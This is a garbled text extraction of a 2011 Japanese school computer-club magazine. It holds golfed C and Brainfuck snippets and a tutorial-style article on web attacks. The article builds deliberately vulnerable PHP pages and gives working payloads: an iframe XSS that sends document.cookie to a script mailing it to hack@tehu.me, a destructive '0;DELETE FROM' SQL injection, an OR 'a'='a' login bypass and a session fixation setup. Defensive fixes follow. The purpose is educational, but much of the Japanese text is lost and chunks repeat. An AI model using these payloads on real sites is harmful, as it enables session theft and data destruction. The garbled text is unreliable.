表紙

Size: px

Start display at page:

Download "表紙"

たみじろうだいほうじ
5 years ago
Views:

++++++++++++++++++++[>>+>++>+++>++ ++>+++++>++++++>+++++++>++++++++>+ ++++++++>++++++++++>+++++++++++>++ ++++++++++<<<<<<<<<<<<<-]>>>>>>>>> >>>+++++++++.<<<<---------.>------ -----.>>>--.<<<<--.>>------------.

1 [>>+>++>+++>++ ++>+++++>++++++> > > > > > <<<<<<<<<<<<<-]>>>>>>>>> >>> <<<< > >>>--.<<<<--.>> >>++.<<---.<----.>>>++.<< <<+++.>>>>----.<<<<---.> >>>.<<<<.>> >>.< <<<-.+.>>>>++++.<<<<.>+.>>>-.<< >>---.<<<<++.> >>>.<< <<-.>>> >.<<<<.>>> >.<<<<+.>>>.>++++.<<-.<+++.> >>.<< >+++.>++.<<<<.>>-.> > <<<<--.>> >> < <<<++.>> >>-.<<++.< >>>-----.<<<<-.> >>>+++++.<<.+++.>>-----.<<<<.>+.>>>.<<<<-.>> >>.<<<< >>>>>-.<< <<< <<<<<<< >+++++>++++++> > <<<<<<<<< >>> <<<< >>>--.<<<<-- >>++.<<---.<----.> <<+++.>>>> >>>.<<<<.>>---- <<<-.+.>>>>++++.<<< >>---.<<<<++ <<-.>>> >.<<<<+.>>>. >>.<< >+++ > <<<<--.>>++ <<<++.>> >>- >>>-----.<<<<-.> >>-----.<<<< >>.<<<< <<< <<<< Nada Personal Computer users Association 2011 Kansai Open Forum Club Magazine

3 1

4 a;main(){ for(scanf( %d,&a);a--;puts( Hello World! )); a=!puts( Good Bye! ); } 2

5 a=!puts( Good Bye ) 3

6 base,out,score;char*a; main(){ for(scanf("%*d");~scanf("%s",a);){ if(a[1]==73) //HIT base++; if(a[1]==79) //HOMERUN score+=base+1,base=0; if(a[1]==85) //OUT if(++out%3==0) base=score=!printf("%d n",base>3?base+score-3:score); } } 4

7 b,o,s; main(a){ for(scanf("%*d");~scanf("%s",&a);){ // HIT: %2=0 %3=1 if(a%3!=0) // OUT: %2=1 %3=2 if(a%2!=0) // HOME: %2=0 %3=0 if(++o%3==0) b=s=!printf("%d n",b>3?b+s-3:s); else b++; else s+=b+1,b=0; } } b,o,s; main(a){ for(scanf("%*d");~scanf("%s",&a);) a%3!=0? a%2!=0? ++o%3!=0?: (b=s=!printf("%d n",b>3?b+s-3:s)) :b++ :(s+=b+1,b=0); } 5

8 b,o,s; main(a){ for(scanf("%*d");~scanf("%s",&a);) b=a%3? a%2? ++o%3?b: (s=!printf("%d n",b>3?b+s-3:s)) :b+1 :!(s+=b+1); } main(a){for(scanf("%*d");~scanf("%s",&a);) b=a%3?a%2?++o%3?b:(s=!printf("%d n",b>3?b+s-3:s)):b+1 :!(s-=~b); } b,o,s;main(a){for(;~scanf("%s",&a);)a>4e6?b=a%3?a&3?++o%3?b:(s=!pri ntf("%d n",b>3?b+s-3:s)):b+1:!(s-=~b):a;} 6

9 7

10 Web System Hacking XSS, SQL Injection and Session Fixation Attack p1. 0 : p2. 1 : p3. 2 : p8. 3 : p10. 4 : Century Font Courier New Font 0. CUI (Character User Interface) 6 (IPA) Web 2 Web 1969 (UCLA) (SRI) ARPANET ( ) 1990 Microsoft Windows 95 HTTP (HyperText Transfer Protocol) Web PHP, JavaScript CGI Perl 8

11 10 9 XSS (Cross Site Scripting 3 ) ( ) 1. 3 XSS (Cross Site Scripting) XSS Web HTML <form> POST POST <iframe> 4 SQL Injection XSS Web SQL SQL SQL INSERT INTO table VALUE ($_POST[ name ]); 2 SF (Session Fixation Attack) PHP 1 ID (SID) ID ID ID 9

12 2. imac (mid 2009) Intel Core 2 Duo 2.93GHz 8GB VMWare FUSION 3.0 OS Ubuntu GB Apache HTTP Server 2.0 Oracle MySQL Postfix PHP 5.3 Vim XSS SOURCE1: FIRST XSS /xss/1/001.html <html> <head><title>xss1</title></head> <body> <form action= 002.php method= post > name:<input type= text name= id ><br> <input type= submit value= send > </form></body></html> /xss/1/002.php <html> <head><title>xss1</title></head> <body> <?php echo done:.$_post[ id ];?> </body></html> name: send Tehu send done: Tehu Javascript <script>alert(document.title);</script> done: <script>alert... XSS1 6 XSS done: <script>alert... HTML ( ) ( ) JavaScript done: <script>alert... done: <script>document.write(document.title); </script> done: XSS1 XSS 10

13 XSS Cookie Cookie Web ID Cookie Cookie JavaScript <script>alert(document.cookie);</script> Web JavaScript 7 XSS POST Cookie Cookie SOURCE2: REAL XSS /xss/2/001.php <?php session_start();?> <body> Keyword: <?php echo $_GET[ id ];?> </body> <form> URL session_start(); Session ID Cookie URL XSS /xss/2/001.php?id=<script>alert(doc... Cookie PHPSESSID=64vis21ftdhjke5r1ba5sdgh... ID ID 8 Cookie Cookie 1 <iframe> /xss/2/900.html <html><body>secret virgin<br><br> <iframe width=320 height=100 src= 001.php?id=<script> window.location= 901.php?id= %2Bdocument.cookie;</script> > </iframe></body></html> 9 /xss/2/901.php <?php mb_language( Japanese ); mb_send_mail( hack@tehu.me, result, cookie:.$_get[ id ], From: cracked@tehu.me );?> <body>attack was succeed!</body> Cookie 900.html iframe 001.php JavaScript Cookie Cookie 901.php PHP iframe 001.php session Cookie Cookie 001.php 900.html Cookie ( ID, ID, ) 11

14 SNS Secret virgin 900.html iframe width height attack was succeed! Cookie iframe width=0 height=0 XSS 10 1 SQL Injection Oracle MySQL hack InnoDB ikimono 10 DATABASE1: hack/ikimono id name birth Yoshiki Mizuno Kiyoe Yoshioka Hotaka Yamashita 1982 PHP SOURCE3: FIRST INJECTION /sql/1/001.php <?php $url = localhost ; $user = root ; $pass = tehutehu ; $db = hack ; $sql = SELECT * FROM ikimono WHERE birth=.$_get[ year ]; $link = mysql_connect($url,$user, $pass) or die("died"); $sdb = mysql_select_db($db,$link) or die("failed to select"); mysql_query("set names utf8"); $result = mysql_query($sql, $link) or die("failed to query ); mysql_close($link) or die( bad cl ); while($row=mysql_fetch_assoc($result)) { echo id:.$row[ id ]. name:. $row[ name ]. <br> ; }?> URL year=1982 /sql/1/001.php?year=1982 id:1 Name:Yoshiki Mizuno id:2 Name:Hotaka Yamashita 1984 Kiyoe Yoshioka 2011 SQL 001.php 6 SELECT * FROM ikimono WHERE birth= SQL 0;DELETE FROM ikimono DATABASE1: hack/ikimono (hacked) id name birth Waring: this table doesn t have any records! 12

15 SQL 11 SQL ikimono Web MySQL 001.html 002.php DATABASE2: hack/login id name pass tehu tehutehu 2 kinta tanki 3 kiyoe hotaka SOURCE4: REAL INJECTION /sql/2/001.html <html> <head><title>sql</title></head> <body> <form action= 002.php method= post > name:<input type= text name= id ><br> pass:<input type= text name= pw ><br> <input type= submit value= send > </form></body></html> /sql/1/002.php <?php $id = $_POST[ id ]; $pw = $_POST[ pw ]; $url = localhost ; $user = root ; $pass = tehutehu ; $db = hack ; $sql = SELECT * FROM login WHERE name=.$id. AND pass=. $pw. ; $link = mysql_connect($url,$user, $pass) or die("died"); $sdb = mysql_select_db($db,$link) or die("failed to select"); mysql_query("set names utf8"); $result = mysql_query($sql, $link) or die("failed to query ); mysql_close($link) or die( bad cl ); if($row=mysql_fetch_assoc($result)){ echo process was done! ; } else { echo authentication was denied! }?> 001.html name: pass: send name:kinta pass:tanki process was done! name:tehu pass:debu authentication was denied! 002.php SQL id pw SQL name tehu pass OR a = a process was done! SQL SELECT * FROM login WHERE name= tehu AND pass= OR a = a name tehu pass a a a a 13

16 SQL pass SQL Injection XSS SQL Injection Web 1 Session Hijack 1) ID ID ID PICT1: SESSION ID HACKS UNIX Time ID Linux /dev/urandom ID 2) ID ID Cookie XSS HTTP SID URL HTTP Referer ID 3) ID ID ID ID ID SOURCE5: SESSION FIXATION /sid/1/.htaccess php_flag session.use_cookies On php_flag session.use_only_cookies Off php_flag session.use_trans_sid On /sid/1/001.php <?php session_start();?><body> <form action= 002.php method= POST > ID:<input name= id type= text ><br> <input type= submit value= Login > </form></body> /sid/1/002.php <?php session_start(); $id = $_POST[ id ]; $_SESSION[ id ] = $id;?> <body> Hello, Mr/Mrs. <?php echo $id;?>!<br> <a href= 003.php >Your Info</a> </body> 14

17 /sid/1/003.php <?php session_start();?> <body> Your Info<br> ID: <?php echo $_SESSION[ id ];?> </body>.htaccess 001.php ID 002.php ID ID php sendmail From Satoru Cho URL PHPSESSID ID 123 ID Satoru Cho ID URL 1.htaccess.htaccess ID URL Cookie PHPSESSID PHP ID ID 3. 3 XSS JavaScript <script>window.location= 901.php?id= %2Bdocument.cookie;</script> 14 15

18 PHP htmlspecialchars($p, ENT_QUOTES, UTF-8 ); ENT_QUOTES 15 < < > > & & " ' &ltscript&gtwindow.location=&#39901.php? id=&#39%2bdocument.cookie;&lt/script&gt SOURCE6: REAL XSS (VER.2) /xss/2/001.php <?php session_start();?> <body> Keyword: <?php echo htmlspecialchars($_get[ id ], ENT_QUOTES, UTF-8 );?> </body> 900.php ID XSS SQL Injection XSS JavaScript SQL htmlspecialchars() addslashes($p); OR a = a Injection \ OR \ a\ =\ a SOURCE7: REAL INJECTION (VER.2) /sql/1/002.php <?php $id = $_POST[ id ]; $pw = $_POST[ pw ]; $url = localhost ; $user = root ; $pass = tehutehu ; $db = hack ; $sql = SELECT * FROM login WHERE name=.$id. AND pass=. addslashes($pw). ; $link = mysql_connect($url,$user, $pass) or die("died"); $sdb = mysql_select_db($db,$link) or die("failed to select"); mysql_query("set names utf8"); $result = mysql_query($sql, $link) or die("failed to query ); mysql_close($link) or die( bad cl ); if($row=mysql_fetch_assoc($result)){ echo process was done! ; } else { echo authentication was denied! }?> URL ID.htaccess SOURCE8: SESSION FIXATION (VER.2) /sid/1/.htaccess php_flag session.use_cookies Off php_flag session.use_only_cookies Off php_flag session.use_trans_sid Off URL Cookie ID 16

19 4. XSS XSS 5 JavaScript JavaScript JavaScript Scheme javascript:alert(document.title) Google Google htmlspecialchars script XSS s/script/xscript/; <script> <xscript> javascript: javaxscript: XSS Internet Explorer expression CSS JavaScript XSS XSS Google XSS SQL Injection SQL Injection addslashes() SQL URL GET POST POST proxy Fiddler (Microsoft) POST 16 HTML input value Telnet POST intval() preg_match( /\d+/, $subject); SQL Injection SQL 17

20 SELECT * FROM table WHERE id= SELECT * FROM table WHERE id= = = SELECT * FROM table WHERE id= SQL Injection SQL SQL SQL SQL SELECT * FROM table WHERE id =? SQL SQL? SQL SQL Injection 100%.htaccess URL Cookie ID Cookie Cookie Internet Explorer 6 HTTP HTTP Referer Cookie ID ID PHP ID session_regenerate_id(true); ID ID ID ID Token Cookie 17 Cookie Token Token Cookie Token 18

22 20

23 21

109 XSS (Cross Site Scripting 3 ) () 1. 3 XSS (Cross Site Scripting) XSSWeb HTML<form> POSTPOST <iframe> 4 SQL Injection XSS Web SQL SQLSQL INSERT INT

109 XSS (Cross Site Scripting 3 ) () 1. 3 XSS (Cross Site Scripting) XSSWeb HTML<form> POSTPOST <iframe> 4 SQL Injection XSS Web SQL SQLSQL INSERT INT Web System Hacking XSS, SQL Injection and Session Fixation Attack p1. 0 : p2. 1 : p3. 2 : p8. 3 : p10. 4 : Century Font Courier New Font 0. CUI (Character User Interface) 6 (IPA) 2011 1 10 Web 2 Web 1969